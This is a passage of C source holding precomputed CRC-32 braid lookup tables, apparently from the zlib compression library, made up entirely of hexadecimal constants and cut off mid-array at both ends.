0x091c4004, 0x6c7b7b42, 0x8d3fddd1, 0xe858e697, 0x47f1ab5d, 0x2296901b, 0xbecf4b1f, 0xdba87059, 0x74013d93, 0x116606d5, 0xf022a046, 0x95459b00, 0x3aecd6ca, 0x5f8bed8c, 0x23149dad, 0x4673a6eb, 0xe9daeb21, 0x8cbdd067, 0x6df976f4, 0x089e4db2, 0xa7370078, 0xc2503b3e, 0x44f5b031, 0x21928b77, 0x8e3bc6bd, 0xeb5cfdfb, 0x0a185b68, 0x6f7f602e, 0xc0d62de4, 0xa5b116a2, 0xd92e6683, 0xbc495dc5, 0x13e0100f, 0x76872b49, 0x97c38dda, 0xf2a4b69c, 0x5d0dfb56, 0x386ac010, 0xa4331b14, 0xc1542052, 0x6efd6d98, 0x0b9a56de, 0xeadef04d, 0x8fb9cb0b, 0x201086c1, 0x4577bd87, 0x39e8cda6, 0x5c8ff6e0, 0xf326bb2a, 0x9641806c, 0x770526ff, 0x12621db9, 0xbdcb5073, 0xd8ac6b35}, {0x00000000, 0xd7e28058, 0x74b406f1, 0xa35686a9, 0xe9680de2, 0x3e8a8dba, 0x9ddc0b13, 0x4a3e8b4b, 0x09a11d85, 0xde439ddd, 0x7d151b74, 0xaaf79b2c, 0xe0c91067, 0x372b903f, 0x947d1696, 0x439f96ce, 0x13423b0a, 0xc4a0bb52, 0x67f63dfb, 0xb014bda3, 0xfa2a36e8, 0x2dc8b6b0, 0x8e9e3019, 0x597cb041, 0x1ae3268f, 0xcd01a6d7, 0x6e57207e, 0xb9b5a026, 0xf38b2b6d, 0x2469ab35, 0x873f2d9c, 0x50ddadc4, 0x26847614, 0xf166f64c, 0x523070e5, 0x85d2f0bd, 0xcfec7bf6, 0x180efbae, 0xbb587d07, 0x6cbafd5f, 0x2f256b91, 0xf8c7ebc9, 0x5b916d60, 0x8c73ed38, 0xc64d6673, 0x11afe62b, 0xb2f96082, 0x651be0da, 0x35c64d1e, 0xe224cd46, 0x41724bef, 0x9690cbb7, 0xdcae40fc, 0x0b4cc0a4, 0xa81a460d, 0x7ff8c655, 0x3c67509b, 0xeb85d0c3, 0x48d3566a, 0x9f31d632, 0xd50f5d79, 0x02eddd21, 0xa1bb5b88, 0x7659dbd0, 0x4d08ec28, 0x9aea6c70, 0x39bcead9, 0xee5e6a81, 0xa460e1ca, 0x73826192, 0xd0d4e73b, 0x07366763, 0x44a9f1ad, 0x934b71f5, 0x301df75c, 0xe7ff7704, 0xadc1fc4f, 0x7a237c17, 0xd975fabe, 0x0e977ae6, 0x5e4ad722, 0x89a8577a, 0x2afed1d3, 0xfd1c518b, 0xb722dac0, 0x60c05a98, 0xc396dc31, 0x14745c69, 0x57ebcaa7, 0x80094aff, 0x235fcc56, 0xf4bd4c0e, 0xbe83c745, 0x6961471d, 0xca37c1b4, 0x1dd541ec, 0x6b8c9a3c, 0xbc6e1a64, 0x1f389ccd, 0xc8da1c95, 0x82e497de, 0x55061786, 0xf650912f, 0x21b21177, 0x622d87b9, 0xb5cf07e1, 0x16998148, 0xc17b0110, 0x8b458a5b, 0x5ca70a03, 0xfff18caa, 0x28130cf2, 
0x78cea136, 0xaf2c216e, 0x0c7aa7c7, 0xdb98279f, 0x91a6acd4, 0x46442c8c, 0xe512aa25, 0x32f02a7d, 0x716fbcb3, 0xa68d3ceb, 0x05dbba42, 0xd2393a1a, 0x9807b151, 0x4fe53109, 0xecb3b7a0, 0x3b5137f8, 0x9a11d850, 0x4df35808, 0xeea5dea1, 0x39475ef9, 0x7379d5b2, 0xa49b55ea, 0x07cdd343, 0xd02f531b, 0x93b0c5d5, 0x4452458d, 0xe704c324, 0x30e6437c, 0x7ad8c837, 0xad3a486f, 0x0e6ccec6, 0xd98e4e9e, 0x8953e35a, 0x5eb16302, 0xfde7e5ab, 0x2a0565f3, 0x603beeb8, 0xb7d96ee0, 0x148fe849, 0xc36d6811, 0x80f2fedf, 0x57107e87, 0xf446f82e, 0x23a47876, 0x699af33d, 0xbe787365, 0x1d2ef5cc, 0xcacc7594, 0xbc95ae44, 0x6b772e1c, 0xc821a8b5, 0x1fc328ed, 0x55fda3a6, 0x821f23fe, 0x2149a557, 0xf6ab250f, 0xb534b3c1, 0x62d63399, 0xc180b530, 0x16623568, 0x5c5cbe23, 0x8bbe3e7b, 0x28e8b8d2, 0xff0a388a, 0xafd7954e, 0x78351516, 0xdb6393bf, 0x0c8113e7, 0x46bf98ac, 0x915d18f4, 0x320b9e5d, 0xe5e91e05, 0xa67688cb, 0x71940893, 0xd2c28e3a, 0x05200e62, 0x4f1e8529, 0x98fc0571, 0x3baa83d8, 0xec480380, 0xd7193478, 0x00fbb420, 0xa3ad3289, 0x744fb2d1, 0x3e71399a, 0xe993b9c2, 0x4ac53f6b, 0x9d27bf33, 0xdeb829fd, 0x095aa9a5, 0xaa0c2f0c, 0x7deeaf54, 0x37d0241f, 0xe032a447, 0x436422ee, 0x9486a2b6, 0xc45b0f72, 0x13b98f2a, 0xb0ef0983, 0x670d89db, 0x2d330290, 0xfad182c8, 0x59870461, 0x8e658439, 0xcdfa12f7, 0x1a1892af, 0xb94e1406, 0x6eac945e, 0x24921f15, 0xf3709f4d, 0x502619e4, 0x87c499bc, 0xf19d426c, 0x267fc234, 0x8529449d, 0x52cbc4c5, 0x18f54f8e, 0xcf17cfd6, 0x6c41497f, 0xbba3c927, 0xf83c5fe9, 0x2fdedfb1, 0x8c885918, 0x5b6ad940, 0x1154520b, 0xc6b6d253, 0x65e054fa, 0xb202d4a2, 0xe2df7966, 0x353df93e, 0x966b7f97, 0x4189ffcf, 0x0bb77484, 0xdc55f4dc, 0x7f037275, 0xa8e1f22d, 0xeb7e64e3, 0x3c9ce4bb, 0x9fca6212, 0x4828e24a, 0x02166901, 0xd5f4e959, 0x76a26ff0, 0xa140efa8}, {0x00000000, 0xef52b6e1, 0x05d46b83, 0xea86dd62, 0x0ba8d706, 0xe4fa61e7, 0x0e7cbc85, 0xe12e0a64, 0x1751ae0c, 0xf80318ed, 0x1285c58f, 0xfdd7736e, 0x1cf9790a, 0xf3abcfeb, 0x192d1289, 0xf67fa468, 0x2ea35c18, 0xc1f1eaf9, 0x2b77379b, 0xc425817a, 0x250b8b1e, 0xca593dff, 
0x20dfe09d, 0xcf8d567c, 0x39f2f214, 0xd6a044f5, 0x3c269997, 0xd3742f76, 0x325a2512, 0xdd0893f3, 0x378e4e91, 0xd8dcf870, 0x5d46b830, 0xb2140ed1, 0x5892d3b3, 0xb7c06552, 0x56ee6f36, 0xb9bcd9d7, 0x533a04b5, 0xbc68b254, 0x4a17163c, 0xa545a0dd, 0x4fc37dbf, 0xa091cb5e, 0x41bfc13a, 0xaeed77db, 0x446baab9, 0xab391c58, 0x73e5e428, 0x9cb752c9, 0x76318fab, 0x9963394a, 0x784d332e, 0x971f85cf, 0x7d9958ad, 0x92cbee4c, 0x64b44a24, 0x8be6fcc5, 0x616021a7, 0x8e329746, 0x6f1c9d22, 0x804e2bc3, 0x6ac8f6a1, 0x859a4040, 0xba8d7060, 0x55dfc681, 0xbf591be3, 0x500bad02, 0xb125a766, 0x5e771187, 0xb4f1cce5, 0x5ba37a04, 0xaddcde6c, 0x428e688d, 0xa808b5ef, 0x475a030e, 0xa674096a, 0x4926bf8b, 0xa3a062e9, 0x4cf2d408, 0x942e2c78, 0x7b7c9a99, 0x91fa47fb, 0x7ea8f11a, 0x9f86fb7e, 0x70d44d9f, 0x9a5290fd, 0x7500261c, 0x837f8274, 0x6c2d3495, 0x86abe9f7, 0x69f95f16, 0x88d75572, 0x6785e393, 0x8d033ef1, 0x62518810, 0xe7cbc850, 0x08997eb1, 0xe21fa3d3, 0x0d4d1532, 0xec631f56, 0x0331a9b7, 0xe9b774d5, 0x06e5c234, 0xf09a665c, 0x1fc8d0bd, 0xf54e0ddf, 0x1a1cbb3e, 0xfb32b15a, 0x146007bb, 0xfee6dad9, 0x11b46c38, 0xc9689448, 0x263a22a9, 0xccbcffcb, 0x23ee492a, 0xc2c0434e, 0x2d92f5af, 0xc71428cd, 0x28469e2c, 0xde393a44, 0x316b8ca5, 0xdbed51c7, 0x34bfe726, 0xd591ed42, 0x3ac35ba3, 0xd04586c1, 0x3f173020, 0xae6be681, 0x41395060, 0xabbf8d02, 0x44ed3be3, 0xa5c33187, 0x4a918766, 0xa0175a04, 0x4f45ece5, 0xb93a488d, 0x5668fe6c, 0xbcee230e, 0x53bc95ef, 0xb2929f8b, 0x5dc0296a, 0xb746f408, 0x581442e9, 0x80c8ba99, 0x6f9a0c78, 0x851cd11a, 0x6a4e67fb, 0x8b606d9f, 0x6432db7e, 0x8eb4061c, 0x61e6b0fd, 0x97991495, 0x78cba274, 0x924d7f16, 0x7d1fc9f7, 0x9c31c393, 0x73637572, 0x99e5a810, 0x76b71ef1, 0xf32d5eb1, 0x1c7fe850, 0xf6f93532, 0x19ab83d3, 0xf88589b7, 0x17d73f56, 0xfd51e234, 0x120354d5, 0xe47cf0bd, 0x0b2e465c, 0xe1a89b3e, 0x0efa2ddf, 0xefd427bb, 0x0086915a, 0xea004c38, 0x0552fad9, 0xdd8e02a9, 0x32dcb448, 0xd85a692a, 0x3708dfcb, 0xd626d5af, 0x3974634e, 0xd3f2be2c, 0x3ca008cd, 0xcadfaca5, 0x258d1a44, 0xcf0bc726, 0x205971c7, 
0xc1777ba3, 0x2e25cd42, 0xc4a31020, 0x2bf1a6c1, 0x14e696e1, 0xfbb42000, 0x1132fd62, 0xfe604b83, 0x1f4e41e7, 0xf01cf706, 0x1a9a2a64, 0xf5c89c85, 0x03b738ed, 0xece58e0c, 0x0663536e, 0xe931e58f, 0x081fefeb, 0xe74d590a, 0x0dcb8468, 0xe2993289, 0x3a45caf9, 0xd5177c18, 0x3f91a17a, 0xd0c3179b, 0x31ed1dff, 0xdebfab1e, 0x3439767c, 0xdb6bc09d, 0x2d1464f5, 0xc246d214, 0x28c00f76, 0xc792b997, 0x26bcb3f3, 0xc9ee0512, 0x2368d870, 0xcc3a6e91, 0x49a02ed1, 0xa6f29830, 0x4c744552, 0xa326f3b3, 0x4208f9d7, 0xad5a4f36, 0x47dc9254, 0xa88e24b5, 0x5ef180dd, 0xb1a3363c, 0x5b25eb5e, 0xb4775dbf, 0x555957db, 0xba0be13a, 0x508d3c58, 0xbfdf8ab9, 0x670372c9, 0x8851c428, 0x62d7194a, 0x8d85afab, 0x6caba5cf, 0x83f9132e, 0x697fce4c, 0x862d78ad, 0x7052dcc5, 0x9f006a24, 0x7586b746, 0x9ad401a7, 0x7bfa0bc3, 0x94a8bd22, 0x7e2e6040, 0x917cd6a1}, {0x00000000, 0x87a6cb43, 0xd43c90c7, 0x539a5b84, 0x730827cf, 0xf4aeec8c, 0xa734b708, 0x20927c4b, 0xe6104f9e, 0x61b684dd, 0x322cdf59, 0xb58a141a, 0x95186851, 0x12bea312, 0x4124f896, 0xc68233d5, 0x1751997d, 0x90f7523e, 0xc36d09ba, 0x44cbc2f9, 0x6459beb2, 0xe3ff75f1, 0xb0652e75, 0x37c3e536, 0xf141d6e3, 0x76e71da0, 0x257d4624, 0xa2db8d67, 0x8249f12c, 0x05ef3a6f, 0x567561eb, 0xd1d3aaa8, 0x2ea332fa, 0xa905f9b9, 0xfa9fa23d, 0x7d39697e, 0x5dab1535, 0xda0dde76, 0x899785f2, 0x0e314eb1, 0xc8b37d64, 0x4f15b627, 0x1c8feda3, 0x9b2926e0, 0xbbbb5aab, 0x3c1d91e8, 0x6f87ca6c, 0xe821012f, 0x39f2ab87, 0xbe5460c4, 0xedce3b40, 0x6a68f003, 0x4afa8c48, 0xcd5c470b, 0x9ec61c8f, 0x1960d7cc, 0xdfe2e419, 0x58442f5a, 0x0bde74de, 0x8c78bf9d, 0xaceac3d6, 0x2b4c0895, 0x78d65311, 0xff709852, 0x5d4665f4, 0xdae0aeb7, 0x897af533, 0x0edc3e70, 0x2e4e423b, 0xa9e88978, 0xfa72d2fc, 0x7dd419bf, 0xbb562a6a, 0x3cf0e129, 0x6f6abaad, 0xe8cc71ee, 0xc85e0da5, 0x4ff8c6e6, 0x1c629d62, 0x9bc45621, 0x4a17fc89, 0xcdb137ca, 0x9e2b6c4e, 0x198da70d, 0x391fdb46, 0xbeb91005, 0xed234b81, 0x6a8580c2, 0xac07b317, 0x2ba17854, 0x783b23d0, 0xff9de893, 0xdf0f94d8, 0x58a95f9b, 0x0b33041f, 0x8c95cf5c, 0x73e5570e, 0xf4439c4d, 
0xa7d9c7c9, 0x207f0c8a, 0x00ed70c1, 0x874bbb82, 0xd4d1e006, 0x53772b45, 0x95f51890, 0x1253d3d3, 0x41c98857, 0xc66f4314, 0xe6fd3f5f, 0x615bf41c, 0x32c1af98, 0xb56764db, 0x64b4ce73, 0xe3120530, 0xb0885eb4, 0x372e95f7, 0x17bce9bc, 0x901a22ff, 0xc380797b, 0x4426b238, 0x82a481ed, 0x05024aae, 0x5698112a, 0xd13eda69, 0xf1aca622, 0x760a6d61, 0x259036e5, 0xa236fda6, 0xba8ccbe8, 0x3d2a00ab, 0x6eb05b2f, 0xe916906c, 0xc984ec27, 0x4e222764, 0x1db87ce0, 0x9a1eb7a3, 0x5c9c8476, 0xdb3a4f35, 0x88a014b1, 0x0f06dff2, 0x2f94a3b9, 0xa83268fa, 0xfba8337e, 0x7c0ef83d, 0xaddd5295, 0x2a7b99d6, 0x79e1c252, 0xfe470911, 0xded5755a, 0x5973be19, 0x0ae9e59d, 0x8d4f2ede, 0x4bcd1d0b, 0xcc6bd648, 0x9ff18dcc, 0x1857468f, 0x38c53ac4, 0xbf63f187, 0xecf9aa03, 0x6b5f6140, 0x942ff912, 0x13893251, 0x401369d5, 0xc7b5a296, 0xe727dedd, 0x6081159e, 0x331b4e1a, 0xb4bd8559, 0x723fb68c, 0xf5997dcf, 0xa603264b, 0x21a5ed08, 0x01379143, 0x86915a00, 0xd50b0184, 0x52adcac7, 0x837e606f, 0x04d8ab2c, 0x5742f0a8, 0xd0e43beb, 0xf07647a0, 0x77d08ce3, 0x244ad767, 0xa3ec1c24, 0x656e2ff1, 0xe2c8e4b2, 0xb152bf36, 0x36f47475, 0x1666083e, 0x91c0c37d, 0xc25a98f9, 0x45fc53ba, 0xe7caae1c, 0x606c655f, 0x33f63edb, 0xb450f598, 0x94c289d3, 0x13644290, 0x40fe1914, 0xc758d257, 0x01dae182, 0x867c2ac1, 0xd5e67145, 0x5240ba06, 0x72d2c64d, 0xf5740d0e, 0xa6ee568a, 0x21489dc9, 0xf09b3761, 0x773dfc22, 0x24a7a7a6, 0xa3016ce5, 0x839310ae, 0x0435dbed, 0x57af8069, 0xd0094b2a, 0x168b78ff, 0x912db3bc, 0xc2b7e838, 0x4511237b, 0x65835f30, 0xe2259473, 0xb1bfcff7, 0x361904b4, 0xc9699ce6, 0x4ecf57a5, 0x1d550c21, 0x9af3c762, 0xba61bb29, 0x3dc7706a, 0x6e5d2bee, 0xe9fbe0ad, 0x2f79d378, 0xa8df183b, 0xfb4543bf, 0x7ce388fc, 0x5c71f4b7, 0xdbd73ff4, 0x884d6470, 0x0febaf33, 0xde38059b, 0x599eced8, 0x0a04955c, 0x8da25e1f, 0xad302254, 0x2a96e917, 0x790cb293, 0xfeaa79d0, 0x38284a05, 0xbf8e8146, 0xec14dac2, 0x6bb21181, 0x4b206dca, 0xcc86a689, 0x9f1cfd0d, 0x18ba364e}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x0000000000000000, 0x43cba68700000000, 
0xc7903cd400000000, 0x845b9a5300000000, 0xcf27087300000000, 0x8cecaef400000000, 0x08b734a700000000, 0x4b7c922000000000, 0x9e4f10e600000000, 0xdd84b66100000000, 0x59df2c3200000000, 0x1a148ab500000000, 0x5168189500000000, 0x12a3be1200000000, 0x96f8244100000000, 0xd53382c600000000, 0x7d99511700000000, 0x3e52f79000000000, 0xba096dc300000000, 0xf9c2cb4400000000, 0xb2be596400000000, 0xf175ffe300000000, 0x752e65b000000000, 0x36e5c33700000000, 0xe3d641f100000000, 0xa01de77600000000, 0x24467d2500000000, 0x678ddba200000000, 0x2cf1498200000000, 0x6f3aef0500000000, 0xeb61755600000000, 0xa8aad3d100000000, 0xfa32a32e00000000, 0xb9f905a900000000, 0x3da29ffa00000000, 0x7e69397d00000000, 0x3515ab5d00000000, 0x76de0dda00000000, 0xf285978900000000, 0xb14e310e00000000, 0x647db3c800000000, 0x27b6154f00000000, 0xa3ed8f1c00000000, 0xe026299b00000000, 0xab5abbbb00000000, 0xe8911d3c00000000, 0x6cca876f00000000, 0x2f0121e800000000, 0x87abf23900000000, 0xc46054be00000000, 0x403bceed00000000, 0x03f0686a00000000, 0x488cfa4a00000000, 0x0b475ccd00000000, 0x8f1cc69e00000000, 0xccd7601900000000, 0x19e4e2df00000000, 0x5a2f445800000000, 0xde74de0b00000000, 0x9dbf788c00000000, 0xd6c3eaac00000000, 0x95084c2b00000000, 0x1153d67800000000, 0x529870ff00000000, 0xf465465d00000000, 0xb7aee0da00000000, 0x33f57a8900000000, 0x703edc0e00000000, 0x3b424e2e00000000, 0x7889e8a900000000, 0xfcd272fa00000000, 0xbf19d47d00000000, 0x6a2a56bb00000000, 0x29e1f03c00000000, 0xadba6a6f00000000, 0xee71cce800000000, 0xa50d5ec800000000, 0xe6c6f84f00000000, 0x629d621c00000000, 0x2156c49b00000000, 0x89fc174a00000000, 0xca37b1cd00000000, 0x4e6c2b9e00000000, 0x0da78d1900000000, 0x46db1f3900000000, 0x0510b9be00000000, 0x814b23ed00000000, 0xc280856a00000000, 0x17b307ac00000000, 0x5478a12b00000000, 0xd0233b7800000000, 0x93e89dff00000000, 0xd8940fdf00000000, 0x9b5fa95800000000, 0x1f04330b00000000, 0x5ccf958c00000000, 0x0e57e57300000000, 0x4d9c43f400000000, 0xc9c7d9a700000000, 0x8a0c7f2000000000, 0xc170ed0000000000, 0x82bb4b8700000000, 
0x06e0d1d400000000, 0x452b775300000000, 0x9018f59500000000, 0xd3d3531200000000, 0x5788c94100000000, 0x14436fc600000000, 0x5f3ffde600000000, 0x1cf45b6100000000, 0x98afc13200000000, 0xdb6467b500000000, 0x73ceb46400000000, 0x300512e300000000, 0xb45e88b000000000, 0xf7952e3700000000, 0xbce9bc1700000000, 0xff221a9000000000, 0x7b7980c300000000, 0x38b2264400000000, 0xed81a48200000000, 0xae4a020500000000, 0x2a11985600000000, 0x69da3ed100000000, 0x22a6acf100000000, 0x616d0a7600000000, 0xe536902500000000, 0xa6fd36a200000000, 0xe8cb8cba00000000, 0xab002a3d00000000, 0x2f5bb06e00000000, 0x6c9016e900000000, 0x27ec84c900000000, 0x6427224e00000000, 0xe07cb81d00000000, 0xa3b71e9a00000000, 0x76849c5c00000000, 0x354f3adb00000000, 0xb114a08800000000, 0xf2df060f00000000, 0xb9a3942f00000000, 0xfa6832a800000000, 0x7e33a8fb00000000, 0x3df80e7c00000000, 0x9552ddad00000000, 0xd6997b2a00000000, 0x52c2e17900000000, 0x110947fe00000000, 0x5a75d5de00000000, 0x19be735900000000, 0x9de5e90a00000000, 0xde2e4f8d00000000, 0x0b1dcd4b00000000, 0x48d66bcc00000000, 0xcc8df19f00000000, 0x8f46571800000000, 0xc43ac53800000000, 0x87f163bf00000000, 0x03aaf9ec00000000, 0x40615f6b00000000, 0x12f92f9400000000, 0x5132891300000000, 0xd569134000000000, 0x96a2b5c700000000, 0xddde27e700000000, 0x9e15816000000000, 0x1a4e1b3300000000, 0x5985bdb400000000, 0x8cb63f7200000000, 0xcf7d99f500000000, 0x4b2603a600000000, 0x08eda52100000000, 0x4391370100000000, 0x005a918600000000, 0x84010bd500000000, 0xc7caad5200000000, 0x6f607e8300000000, 0x2cabd80400000000, 0xa8f0425700000000, 0xeb3be4d000000000, 0xa04776f000000000, 0xe38cd07700000000, 0x67d74a2400000000, 0x241ceca300000000, 0xf12f6e6500000000, 0xb2e4c8e200000000, 0x36bf52b100000000, 0x7574f43600000000, 0x3e08661600000000, 0x7dc3c09100000000, 0xf9985ac200000000, 0xba53fc4500000000, 0x1caecae700000000, 0x5f656c6000000000, 0xdb3ef63300000000, 0x98f550b400000000, 0xd389c29400000000, 0x9042641300000000, 0x1419fe4000000000, 0x57d258c700000000, 0x82e1da0100000000, 0xc12a7c8600000000, 
0x4571e6d500000000, 0x06ba405200000000, 0x4dc6d27200000000, 0x0e0d74f500000000, 0x8a56eea600000000, 0xc99d482100000000, 0x61379bf000000000, 0x22fc3d7700000000, 0xa6a7a72400000000, 0xe56c01a300000000, 0xae10938300000000, 0xeddb350400000000, 0x6980af5700000000, 0x2a4b09d000000000, 0xff788b1600000000, 0xbcb32d9100000000, 0x38e8b7c200000000, 0x7b23114500000000, 0x305f836500000000, 0x739425e200000000, 0xf7cfbfb100000000, 0xb404193600000000, 0xe69c69c900000000, 0xa557cf4e00000000, 0x210c551d00000000, 0x62c7f39a00000000, 0x29bb61ba00000000, 0x6a70c73d00000000, 0xee2b5d6e00000000, 0xade0fbe900000000, 0x78d3792f00000000, 0x3b18dfa800000000, 0xbf4345fb00000000, 0xfc88e37c00000000, 0xb7f4715c00000000, 0xf43fd7db00000000, 0x70644d8800000000, 0x33afeb0f00000000, 0x9b0538de00000000, 0xd8ce9e5900000000, 0x5c95040a00000000, 0x1f5ea28d00000000, 0x542230ad00000000, 0x17e9962a00000000, 0x93b20c7900000000, 0xd079aafe00000000, 0x054a283800000000, 0x46818ebf00000000, 0xc2da14ec00000000, 0x8111b26b00000000, 0xca6d204b00000000, 0x89a686cc00000000, 0x0dfd1c9f00000000, 0x4e36ba1800000000}, {0x0000000000000000, 0xe1b652ef00000000, 0x836bd40500000000, 0x62dd86ea00000000, 0x06d7a80b00000000, 0xe761fae400000000, 0x85bc7c0e00000000, 0x640a2ee100000000, 0x0cae511700000000, 0xed1803f800000000, 0x8fc5851200000000, 0x6e73d7fd00000000, 0x0a79f91c00000000, 0xebcfabf300000000, 0x89122d1900000000, 0x68a47ff600000000, 0x185ca32e00000000, 0xf9eaf1c100000000, 0x9b37772b00000000, 0x7a8125c400000000, 0x1e8b0b2500000000, 0xff3d59ca00000000, 0x9de0df2000000000, 0x7c568dcf00000000, 0x14f2f23900000000, 0xf544a0d600000000, 0x9799263c00000000, 0x762f74d300000000, 0x12255a3200000000, 0xf39308dd00000000, 0x914e8e3700000000, 0x70f8dcd800000000, 0x30b8465d00000000, 0xd10e14b200000000, 0xb3d3925800000000, 0x5265c0b700000000, 0x366fee5600000000, 0xd7d9bcb900000000, 0xb5043a5300000000, 0x54b268bc00000000, 0x3c16174a00000000, 0xdda045a500000000, 0xbf7dc34f00000000, 0x5ecb91a000000000, 0x3ac1bf4100000000, 
0xdb77edae00000000, 0xb9aa6b4400000000, 0x581c39ab00000000, 0x28e4e57300000000, 0xc952b79c00000000, 0xab8f317600000000, 0x4a39639900000000, 0x2e334d7800000000, 0xcf851f9700000000, 0xad58997d00000000, 0x4ceecb9200000000, 0x244ab46400000000, 0xc5fce68b00000000, 0xa721606100000000, 0x4697328e00000000, 0x229d1c6f00000000, 0xc32b4e8000000000, 0xa1f6c86a00000000, 0x40409a8500000000, 0x60708dba00000000, 0x81c6df5500000000, 0xe31b59bf00000000, 0x02ad0b5000000000, 0x66a725b100000000, 0x8711775e00000000, 0xe5ccf1b400000000, 0x047aa35b00000000, 0x6cdedcad00000000, 0x8d688e4200000000, 0xefb508a800000000, 0x0e035a4700000000, 0x6a0974a600000000, 0x8bbf264900000000, 0xe962a0a300000000, 0x08d4f24c00000000, 0x782c2e9400000000, 0x999a7c7b00000000, 0xfb47fa9100000000, 0x1af1a87e00000000, 0x7efb869f00000000, 0x9f4dd47000000000, 0xfd90529a00000000, 0x1c26007500000000, 0x74827f8300000000, 0x95342d6c00000000, 0xf7e9ab8600000000, 0x165ff96900000000, 0x7255d78800000000, 0x93e3856700000000, 0xf13e038d00000000, 0x1088516200000000, 0x50c8cbe700000000, 0xb17e990800000000, 0xd3a31fe200000000, 0x32154d0d00000000, 0x561f63ec00000000, 0xb7a9310300000000, 0xd574b7e900000000, 0x34c2e50600000000, 0x5c669af000000000, 0xbdd0c81f00000000, 0xdf0d4ef500000000, 0x3ebb1c1a00000000, 0x5ab132fb00000000, 0xbb07601400000000, 0xd9dae6fe00000000, 0x386cb41100000000, 0x489468c900000000, 0xa9223a2600000000, 0xcbffbccc00000000, 0x2a49ee2300000000, 0x4e43c0c200000000, 0xaff5922d00000000, 0xcd2814c700000000, 0x2c9e462800000000, 0x443a39de00000000, 0xa58c6b3100000000, 0xc751eddb00000000, 0x26e7bf3400000000, 0x42ed91d500000000, 0xa35bc33a00000000, 0xc18645d000000000, 0x2030173f00000000, 0x81e66bae00000000, 0x6050394100000000, 0x028dbfab00000000, 0xe33bed4400000000, 0x8731c3a500000000, 0x6687914a00000000, 0x045a17a000000000, 0xe5ec454f00000000, 0x8d483ab900000000, 0x6cfe685600000000, 0x0e23eebc00000000, 0xef95bc5300000000, 0x8b9f92b200000000, 0x6a29c05d00000000, 0x08f446b700000000, 0xe942145800000000, 0x99bac88000000000, 
0x780c9a6f00000000, 0x1ad11c8500000000, 0xfb674e6a00000000, 0x9f6d608b00000000, 0x7edb326400000000, 0x1c06b48e00000000, 0xfdb0e66100000000, 0x9514999700000000, 0x74a2cb7800000000, 0x167f4d9200000000, 0xf7c91f7d00000000, 0x93c3319c00000000, 0x7275637300000000, 0x10a8e59900000000, 0xf11eb77600000000, 0xb15e2df300000000, 0x50e87f1c00000000, 0x3235f9f600000000, 0xd383ab1900000000, 0xb78985f800000000, 0x563fd71700000000, 0x34e251fd00000000, 0xd554031200000000, 0xbdf07ce400000000, 0x5c462e0b00000000, 0x3e9ba8e100000000, 0xdf2dfa0e00000000, 0xbb27d4ef00000000, 0x5a91860000000000, 0x384c00ea00000000, 0xd9fa520500000000, 0xa9028edd00000000, 0x48b4dc3200000000, 0x2a695ad800000000, 0xcbdf083700000000, 0xafd526d600000000, 0x4e63743900000000, 0x2cbef2d300000000, 0xcd08a03c00000000, 0xa5acdfca00000000, 0x441a8d2500000000, 0x26c70bcf00000000, 0xc771592000000000, 0xa37b77c100000000, 0x42cd252e00000000, 0x2010a3c400000000, 0xc1a6f12b00000000, 0xe196e61400000000, 0x0020b4fb00000000, 0x62fd321100000000, 0x834b60fe00000000, 0xe7414e1f00000000, 0x06f71cf000000000, 0x642a9a1a00000000, 0x859cc8f500000000, 0xed38b70300000000, 0x0c8ee5ec00000000, 0x6e53630600000000, 0x8fe531e900000000, 0xebef1f0800000000, 0x0a594de700000000, 0x6884cb0d00000000, 0x893299e200000000, 0xf9ca453a00000000, 0x187c17d500000000, 0x7aa1913f00000000, 0x9b17c3d000000000, 0xff1ded3100000000, 0x1eabbfde00000000, 0x7c76393400000000, 0x9dc06bdb00000000, 0xf564142d00000000, 0x14d246c200000000, 0x760fc02800000000, 0x97b992c700000000, 0xf3b3bc2600000000, 0x1205eec900000000, 0x70d8682300000000, 0x916e3acc00000000, 0xd12ea04900000000, 0x3098f2a600000000, 0x5245744c00000000, 0xb3f326a300000000, 0xd7f9084200000000, 0x364f5aad00000000, 0x5492dc4700000000, 0xb5248ea800000000, 0xdd80f15e00000000, 0x3c36a3b100000000, 0x5eeb255b00000000, 0xbf5d77b400000000, 0xdb57595500000000, 0x3ae10bba00000000, 0x583c8d5000000000, 0xb98adfbf00000000, 0xc972036700000000, 0x28c4518800000000, 0x4a19d76200000000, 0xabaf858d00000000, 0xcfa5ab6c00000000, 
0x2e13f98300000000, 0x4cce7f6900000000, 0xad782d8600000000, 0xc5dc527000000000, 0x246a009f00000000, 0x46b7867500000000, 0xa701d49a00000000, 0xc30bfa7b00000000, 0x22bda89400000000, 0x40602e7e00000000, 0xa1d67c9100000000}, {0x0000000000000000, 0x5880e2d700000000, 0xf106b47400000000, 0xa98656a300000000, 0xe20d68e900000000, 0xba8d8a3e00000000, 0x130bdc9d00000000, 0x4b8b3e4a00000000, 0x851da10900000000, 0xdd9d43de00000000, 0x741b157d00000000, 0x2c9bf7aa00000000, 0x6710c9e000000000, 0x3f902b3700000000, 0x96167d9400000000, 0xce969f4300000000, 0x0a3b421300000000, 0x52bba0c400000000, 0xfb3df66700000000, 0xa3bd14b000000000, 0xe8362afa00000000, 0xb0b6c82d00000000, 0x19309e8e00000000, 0x41b07c5900000000, 0x8f26e31a00000000, 0xd7a601cd00000000, 0x7e20576e00000000, 0x26a0b5b900000000, 0x6d2b8bf300000000, 0x35ab692400000000, 0x9c2d3f8700000000, 0xc4addd5000000000, 0x1476842600000000, 0x4cf666f100000000, 0xe570305200000000, 0xbdf0d28500000000, 0xf67beccf00000000, 0xaefb0e1800000000, 0x077d58bb00000000, 0x5ffdba6c00000000, 0x916b252f00000000, 0xc9ebc7f800000000, 0x606d915b00000000, 0x38ed738c00000000, 0x73664dc600000000, 0x2be6af1100000000, 0x8260f9b200000000, 0xdae01b6500000000, 0x1e4dc63500000000, 0x46cd24e200000000, 0xef4b724100000000, 0xb7cb909600000000, 0xfc40aedc00000000, 0xa4c04c0b00000000, 0x0d461aa800000000, 0x55c6f87f00000000, 0x9b50673c00000000, 0xc3d085eb00000000, 0x6a56d34800000000, 0x32d6319f00000000, 0x795d0fd500000000, 0x21dded0200000000, 0x885bbba100000000, 0xd0db597600000000, 0x28ec084d00000000, 0x706cea9a00000000, 0xd9eabc3900000000, 0x816a5eee00000000, 0xcae160a400000000, 0x9261827300000000, 0x3be7d4d000000000, 0x6367360700000000, 0xadf1a94400000000, 0xf5714b9300000000, 0x5cf71d3000000000, 0x0477ffe700000000, 0x4ffcc1ad00000000, 0x177c237a00000000, 0xbefa75d900000000, 0xe67a970e00000000, 0x22d74a5e00000000, 0x7a57a88900000000, 0xd3d1fe2a00000000, 